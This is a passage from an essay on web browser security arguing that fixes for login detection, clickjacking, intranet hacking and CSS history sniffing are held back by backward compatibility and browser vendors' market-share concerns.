are only too happy to comply. Their
choice is simple: be less secure and
more user-adopted, or be secure and
obscure. This is the Web security trade-off—a choice made by those who do
not fully understand, appreciate, or are
liable for the risks they are imposing
on everyone using the Web.
Nonstarter solutions
To fix login detection, a browser might
decide not to send the Web visitor’s
cookie data to off-domain destinations (those different from the hostname in the URL bar) along with the
Web requests. Cookies are essential to
tracking login state. The off-domain
destination could still get the request,
but would not know to whom it belonged. This is a good thing for stopping the attack.
Not sending cookies off-domain,
however, would break functionality for any website that uses multiple
hostnames to deliver authenticated
content. The approach would break
single-click Web widgets such as Twitter’s “Follow,” Facebook’s “Like,” and
Google’s “+ 1” buttons. The user would
be required to perform a second step.
It would also break visitor tracking via
Google Analytics, Coremetrics, and so
on. This is a clear nonstarter from the
perspective of many.
To fix clickjacking, Web browsers could ban iframes entirely, or at
least ban transparent iframes. Ideally, browser users should be able to
“see” what they are really clicking on.
Suggesting such a change to iframes,
however, is a losing battle; millions of
websites rely upon them, including
transparent iframes, for essential
functionality. Notable examples are
Facebook, Gmail, and Yahoo! Mail. You
do not normally see iframes when they
are used, but they are indeed everywhere. That level of breakage is never
going to be tolerated.
For browser intranet hacking, Web
browsers could prohibit the inclusion of RFC-1918 resources from non-
RFC-1918 websites. This essentially
creates a break point in the browser
between public and private networks.
One reason that browser vendors say
this is not doable is that some organizations actually do legitimately include
intranet content on public websites.
Therefore, because some organiza-
Dramatic
improvements
in browser security
and online privacy
are held hostage
by backward
compatibility
requirements
related to
how the internet
was designed.
tions (whom you have never heard of
and whose websites you’ll never visit)
have an odd use case, your browser
leaves the private networks you are on,
and that of hundreds of millions of
others, wide open.
As shocking as this sounds, try
looking at the decision not to fix the
problem from the browser vendors’
perspective. If they break the uncommon use case of these unnamed organizations, the people within those
organizations are forced to switch to a
competing “less-secure” browser that
allows them to continue business as
usual. While the security of all other
users increases for the browser that
makes the change, that browser vendor
loses some fraction of market share.
security Chasm
The browser vendors’ unwillingness to
risk market share has led to the current
security chasm. Dramatic improvements in browser security and online
privacy are held hostage by backward
compatibility requirements related to
how the Internet was designed. Web-browser vendors compete with each
other in trench-style warfare, gaining
ground by scratching for a tiny percentage of new users, everyday—users who
do not pay them a dime, while simultaneously trying to keep every last user
they already have.
It’s important to remember that
mainstream browsers are essentially
advertising platforms. The more eyeballs browsers have, the more ads are
delivered. Ads, and ad clicks, are what
pay for the whole party. Anything getting in the way of that is never a priority.
To be fair, there was one important win recently when, after years of
discussion, a fix was applied to CSS
history sniffing. This is the ability of a
website to uncover the history of other
websites a user had visited by creating
hyperlinks on a Web page and using either JavaScript or CSS to check the color of the link displayed on the screen.
A blue link meant the visitor had not
been there; purple indicated the user
had visited the site. This was a serious
privacy flaw that was simple, effective, and 10,000-URLs-per-second fast
to execute. Any website could quickly
know where you banked, shopped,
what news you read, adult websites frequented, among others.